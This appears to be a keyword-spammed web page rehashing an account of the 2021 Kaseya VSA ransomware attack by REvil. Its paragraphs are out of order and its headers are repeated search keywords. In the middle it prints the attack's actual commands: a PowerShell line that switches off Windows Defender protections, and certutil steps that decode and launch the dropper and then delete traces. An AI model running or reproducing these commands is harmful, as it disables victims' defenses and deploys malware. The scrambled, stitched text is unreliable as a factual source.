Kaseya agent registry keys
- #KASEYA AGENT REGISTRY KEYS UPDATE#
- #KASEYA AGENT REGISTRY KEYS SOFTWARE#
- #KASEYA AGENT REGISTRY KEYS DOWNLOAD#
- #KASEYA AGENT REGISTRY KEYS WINDOWS#
The encryption is performed on the same disk sectors as the source documents, making recovery by disk analysis impossible. The ransomware and its means of propagation is of the type usually used by REvil, namely Sodinokibi.
#KASEYA AGENT REGISTRY KEYS SOFTWARE#
But because the malware is downloaded into a directory where the antivirus is not intended to be active, and this is done via an "official" software feed, this obfuscation is not essential. Obfuscation is achieved via base 64 encoding. Once executed, the AGENT.EXE software loads another executable, MSMPENG.EXE, signed by Microsoft, to perform a side-channel attack by loading the corrupted MSMPENG.DLL.
#KASEYA AGENT REGISTRY KEYS WINDOWS#
These different commands serve to disable Windows Defender and use cert.exe to decode the dropper. The Agent Monitor then executes the following commands:Ĭ:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendĬopy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exeĬ:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking1\agent.exeĭel /q /f c:\kworking\agent.crt C:\Windows\cert.exe
#KASEYA AGENT REGISTRY KEYS UPDATE#
The dropper is loaded by the Agent Monitor as AGENT.CRT into the c:\Kworking\ update directory. Technical details on the attack Deployment It is then distributed throughout the IS, again via the VSA tool. This agent is run in a space in which antivirus scanning is disabled (as recommended by Kaseya.), making it easy for the malware to execute.
#KASEYA AGENT REGISTRY KEYS DOWNLOAD#
The end-client was compromised directly via the Kaseya Agent Monitor tool, which performs the download itself (in the form of a hotfix) directly from the VSA. These servers are used to update Kaseya's local monitoring agents (Agent Monitor). The initial compromise of the VSA tool appears to have been carried out via a zero-day SQL injection on VSA's front-end Internet servers. Early indications are that at least 60 customers have already fallen victim to encryption, with members of the REvil group demanding a ransom of 70 million dollars for the decryption key. currently 40 and 1,000 companies respectively, across a total of approximately 1 million environments.
The exploit theoretically allows cyber-criminals to compromise all reseller Service Providers and their customers i.e. This software, deployed as SaaS, is used to supervise and manage the information systems of tens of thousands of customers worldwide.
The attack was confirmed by the provider in a statement published the same day on its website, with the finger currently being pointed at the REvil cyber-criminal group. The cyber attack was triggered by the exploitation of a flaw in the VSA management software owned by the Kaseya company. On 2 July, researchers from Huntress Labs discovered a new wave of ransomware on several hundred companies’ systems. Read more about a major new cyber attack. The attack appears to have been carried out via IT management software (VSA) owned by the American company Kaseya. In early July 2021, several hundred companies fall victim to a ransomware attack.